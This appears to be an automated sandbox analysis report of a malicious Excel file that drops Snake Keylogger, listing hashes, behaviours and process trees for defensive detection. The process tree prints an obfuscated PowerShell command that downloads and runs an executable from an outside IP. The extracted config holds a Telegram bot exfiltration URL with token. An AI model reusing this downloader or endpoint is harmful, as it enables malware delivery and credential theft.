Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8.xls
Resource
win10v2004-20241007-en
General
-
Target
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8.xls
-
Size
848KB
-
MD5
5a232e6f517ecc2663439fcf2a28573d
-
SHA1
155a24515072423a751465a774fc6e3e24e21f84
-
SHA256
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8
-
SHA512
a96e1d03f6155e30e236d4234c0c352911d3780cd59493ea8545296dc8b42c2befed3972adfbf0001df24023e522547d00bb2de68c27d729cf689487ad5b4f49
-
SSDEEP
12288:YmzHJE+CzldQD3DERnLRmF8D5JhuiC3LaQlOh4cjUVwUi4t7W:zczlWbARM8NTC3eQ0h4eU
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2200-69-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2200-71-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2200-70-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2688 mshta.exe 11 2688 mshta.exe 13 2088 pOWeRSHEll.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2088 pOWeRSHEll.exe 2864 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3016 wlanext.exe -
Loads dropped DLL 1 IoCs
pid Process 2088 pOWeRSHEll.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00080000000174f8-62.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk pOWeRSHEll.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3016 set thread context of 2200 3016 wlanext.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSHEll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2448 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2088 pOWeRSHEll.exe 2864 powershell.exe 2088 pOWeRSHEll.exe 2088 pOWeRSHEll.exe 2200 RegSvcs.exe 2200 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3016 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2088 pOWeRSHEll.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2200 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3016 wlanext.exe 3016 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3016 wlanext.exe 3016 wlanext.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2688 wrote to memory of 2088 2688 mshta.exe 33 PID 2688 wrote to memory of 2088 2688 mshta.exe 33 PID 2688 wrote to memory of 2088 2688 mshta.exe 33 PID 2688 wrote to memory of 2088 2688 mshta.exe 33 PID 2088 wrote to memory of 2864 2088 pOWeRSHEll.exe 35 PID 2088 wrote to memory of 2864 2088 pOWeRSHEll.exe 35 PID 2088 wrote to memory of 2864 2088 pOWeRSHEll.exe 35 PID 2088 wrote to memory of 2864 2088 pOWeRSHEll.exe 35 PID 2088 wrote to memory of 1564 2088 pOWeRSHEll.exe 36 PID 2088 wrote to memory of 1564 2088 pOWeRSHEll.exe 36 PID 2088 wrote to memory of 1564 2088 pOWeRSHEll.exe 36 PID 2088 wrote to memory of 1564 2088 pOWeRSHEll.exe 36 PID 1564 wrote to memory of 2868 1564 csc.exe 37 PID 1564 wrote to memory of 2868 1564 csc.exe 37 PID 1564 wrote to memory of 2868 1564 csc.exe 37 PID 1564 wrote to memory of 2868 1564 csc.exe 37 PID 2088 wrote to memory of 3016 2088 pOWeRSHEll.exe 39 PID 2088 wrote to memory of 3016 2088 pOWeRSHEll.exe 39 PID 2088 wrote to memory of 3016 2088 pOWeRSHEll.exe 39 PID 2088 wrote to memory of 3016 2088 pOWeRSHEll.exe 39 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 PID 3016 wrote to memory of 2200 3016 wlanext.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2448
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe"C:\Windows\systEm32\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe" "poweRshELl.ExE -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt ; IEx($(IeX('[sysTEM.TExT.eNcODiNG]'+[CHAr]58+[cHAr]58+'utf8.GEtStrIng([sYStEM.CONVert]'+[cHaR]58+[ChAR]58+'FRoMBASE64stRiNG('+[chaR]0X22+'JHpWV21LICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlZklOaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVJdEd0RkxyayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlPaGNCWkMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnRFl3bFBXUURDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp1UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3Z05LQ3FQWk8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3RhaHNQek92IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hrSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpWV21LOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTYxL3dsYW5leHQuZXhlIiwiJEVuVjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3N0QVJ0LVNsRWVQKDMpO3NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rsstzjwn.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA95.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA94.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2200
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD50fce0bd63c4a65dc1bea2caeb6d97bb5
SHA1f018de670c8c846edda01078601098fcebc135c0
SHA256f51c69140d8aea8cb82702c3e83f39754dcffdc942abf5a88ff379dc722d0cb6
SHA512cdc259f079cb3bd3425ae9fddc9dd7039876ac5c87523fe6112ad8121e862f63c72e958bfc5a8a84ecb5ce97a748528f002ae2041b1d625a37247f6b88e6f926
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5dd106773f3bab6526ea510c9e7d7483d
SHA1dd157027f09dd35675e13f3016fc2356a372ac62
SHA2569dea8c020f5f9440748895a7c12ded2d6c9c0b9783568a60625d0e01fc9b22bb
SHA5128456385170b86e90c98ca33e61267a0e69b2c41d905a8f307e56d7f9c357e9c8937386433536515177eec9985d0f090156df00ef041a15bdaaf04b8348faae18
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethemagicalpersoninmylifewithherlifegoodforme[1].hta
Filesize8KB
MD524dcf722096ca6d02bbb70733ae01abc
SHA1fb8166a57aaf6d4837dfb686b84ee51474941c83
SHA256e0d07f596090db80fff8fb48b11999010611ac352534fadcf295c7ac47042bdd
SHA512bb055ad22ba25be389d212fe6517b28244234d259cb0dc870eb7691b6ac3f99ed1d3a8408552f3f1fed9d29313a4a14d5a3fc3c08c629790990a8229f8ab33da
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD578eb01d80e5bc923320ad0f2a1e9c570
SHA17afbabce5f62b53e0d57c12ba21da41d26ca6ee5
SHA2567565b9fba1795c9607b0ec0d984717aebb7663c651d4fe9e73d1279e349dc68f
SHA5123ece9fdba6344d18c2c7180f696118bd2ad9cd9565ac3b9def14cdc9f718c7c0af224a5a5bc49d8b7f79995dab1352df3e221cf4f22c7abee1af1da8c385a0e7
-
Filesize
3KB
MD582fa5cb6d09a94a60b34213d5d1174f1
SHA1f449c222370410ab1f2d7f61c1a919b9b9c58654
SHA256ce0a4ab83cf69a111687a6ca9fb2e55a6a16322562a3cf18fb5dbb176503219f
SHA5122f785728a94b23adaff8e7b053496359a25986fb6835df2f73ef76b629e3536d6a28e14b25befbba6c62146b3e7a33f1d0b7b2729d6570c52d6173281540e3fa
-
Filesize
7KB
MD5daf1116c7558c164dd520ab9be74fdfd
SHA1e93297b3fc332776b3049b1e07f702354eab8235
SHA25600dafb9df52e57722da965ad28b2b45ecdcd85c8e4da26fd1ce5f63d14ab1dac
SHA512680e762066037678ebbd437e4f0e5af82943f04093a8ceb141cdc9075ce2cda204c89f12fd1eb0271bd9cb8feb6f22a72a44e1a5d802a1591270b23fb6d34c91
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d49b376ff1b0d85bc219a35d9e32a086
SHA161e3582805e874ae61376db5ab0653be911e2b9e
SHA25656ab4143899b9e6df620827bf7fc4be653969a544f73eb3e49b70404678b2f25
SHA512377f218194f917053919df5235a9887633f4af0e42adc92690a6012ab1d7c6185d620bffd3615b1eb022e7f682bed8e1001d2798973f2ee5c408d9a911fa346a
-
Filesize
652B
MD5639e658be7b9a313410edfdefdc98d62
SHA12f50a4ce715b6136ac7a335ed52b7aa3ca3a1d94
SHA256af25fcaa4f4cad47a68456f2e6f66f5741f400e7a62dc0a3485cf15c7a258ef0
SHA5125f162c9c8982e6f947612ad3b423317705b38a1fce5e6fadf07daffc850eaab53790c2da8984fa90bba9c52062f552d6d74895e2121d8102619774276f67a4c4
-
Filesize
483B
MD54c5d6a51b5bad9b89090a128b2676ef5
SHA113fbf9031d31d7c621c9fa9816818b341377d487
SHA256c849809f9d06a8ef3bbd4de89bc706fbd851231f8dfe9f8ed84800c9b67e80d7
SHA512a3f1573cee336b8efe076e8746e5a61e73d46b539cb5170f297262a5327e7b43e0c45cfe93682e93b92f20e878ae9e21e60502dbcdf492236ea642f15290601d
-
Filesize
309B
MD5efb8e60258b5505bda837d2d45312c00
SHA1c0ede93060d646ef858db4df931f0ee6743d7b92
SHA25636907a796f9d11653ddc829b779a6831afc392c124b66e82fe6a3b4227d1b3d4
SHA512671f02b091c60c0b0077ab38180187035f11ddc661a56efe0b3a81f265a817d16341518a9c501e98bda3a513856ba73072367d4f829dca419dd4a14b496f5ff3
-
Filesize
910KB
MD5d70ae089068975f5c914ba70c40c3527
SHA1b0a81c280689f14bfa4d499955c80155e045e662
SHA2562385bc1316c82968a13b95bb465c19f7675a6d3504fc3b8c028c00d7acbdc022
SHA512532dd387f2a6757185aa6da0983d71277c2a7d9774482f27ba6d55478a7035df8b911457523569151be68e45ca6ee0e3a1f3cbff1eaab7d8126454a204532697